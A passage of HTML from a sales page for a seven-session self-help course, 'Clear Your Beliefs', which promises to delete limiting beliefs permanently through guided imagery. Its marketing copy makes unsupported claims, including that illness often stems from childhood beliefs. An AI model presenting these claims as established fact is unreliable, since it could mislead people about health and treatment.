src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul>\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, 